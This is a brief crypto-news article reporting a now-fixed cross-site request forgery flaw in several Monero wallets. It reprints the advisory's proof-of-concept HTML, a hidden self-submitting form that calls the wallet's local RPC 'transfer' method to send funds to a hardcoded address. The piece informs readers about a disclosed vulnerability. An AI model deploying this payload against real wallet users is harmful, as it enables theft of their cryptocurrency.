Monero Wallet Security Threat Fixed with the Latest Hotfix

BitsPlan

Owing to its additional privacy and security features, Monero is notably giving Bitcoin a tough competition as a darknet currency. However, a recent security alert has indicated that even though Monero transactions are safe and secure, the wallets aren’t.

MWR Labs, a cybersecurity company, had released an advisory earlier this month stating the presence of a Cross Site request Forgery vulnerability. The vulnerability could potentially allow attackers to remotely steal Monero cryptocurrency from users who are using the compromised version of wallet. The list of vulnerable wallets included – Monero SimpleWallet, LightWallet, Wallet Chrome, GUI Client.net, Minonodo and other wallets for JS, NodeJS, and QT.

All these vulnerable wallets were known to host an RPC web service on the local host – port 10802 – which eliminated the need for user authentication during payment initiation. MWR Labs, in its advisory, also posted the code snippet that can be used to exploit the vulnerability. Here is what it looks like:

html  

    form action=http://127.0.0.1:18082/json_rpc method=post enctype="text/plain" name="pay"   

        input name='{"jsonrpc":"2.0","id":"0","method":"transfer","params":{"destinations":[{"amount":100000000000,"address":"49FuXtv95dkZj5aDaoWkbjQRv9Qu6UMwAAJKP68vksbpRJEPNZfkr6Ecbj9wrqG4xHAiMArmpGsxRbkmxAC8NEydBEvc162"}],"fee":000000000000,"mixin":3,"unlock_time":0,"payment_id":"","get_tx_key":true}}' type='hidden'  

    /form  

    script

         document.pay.submit()

    /script

/html  

Since the issue was made public, the team behind Monero cryptocurrency have fixed the issue

Read more ... source: NewsBTC USA

NO COMMENTS